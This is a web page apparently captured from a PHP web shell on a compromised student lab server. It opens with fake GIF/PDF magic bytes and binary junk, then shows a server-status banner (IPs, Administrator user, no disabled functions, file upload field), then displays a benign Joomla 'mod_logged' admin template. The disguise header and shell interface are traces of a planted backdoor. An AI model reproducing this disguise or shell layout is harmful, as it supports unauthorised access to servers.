GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/Joomla/administrator/modules/mod_logged/tmpl/ |
Upload File : |
<?php /** * @package Joomla.Administrator * @subpackage mod_logged * @copyright Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ // No direct access. defined('_JEXEC') or die; ?> <table class="adminlist"> <thead> <tr> <th> <?php if($params->get('name', 1)) { echo JText::_('MOD_LOGGED_NAME'); } else { echo JText::_('JGLOBAL_USERNAME'); }; ?> </th> <th> <strong><?php echo JText::_('JCLIENT'); ?></strong> </th> <th> <strong><?php echo JText::_('JGRID_HEADING_ID');?></strong> </th> <th> <strong><?php echo JText::_('MOD_LOGGED_LAST_ACTIVITY');?></strong> </th> <th> <strong><?php echo JText::_('MOD_LOGGED_LOGOUT');?></strong> </th> </tr> </thead> <tbody> <?php foreach ($users as $user) : ?> <tr> <th scope="row"> <?php if (isset($user->editLink)) :?> <a href="<?php echo $user->editLink; ?>"> <?php echo $user->name;?></a> <?php else : echo $user->name; endif; ?> </th> <td class="center"> <?php if($user->client_id) { echo JText::_('JADMINISTRATOR'); } else { echo JText::_('JSITE'); }?> </td> <td class="center"> <?php echo $user->id; ?> </td> <td class="center"> <?php echo JHtml::_('date', $user->time, 'Y-m-d H:i:s'); ?> </td> <td class="center"> <?php if ($user->client_id == 0) :?> <a href="<?php echo $user->logoutLink;?>"> <?php echo JHtml::_('image', 'mod_logged/icon-16-logout.png', JText::_('JLOGOUT'), null, true);?> </a> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table>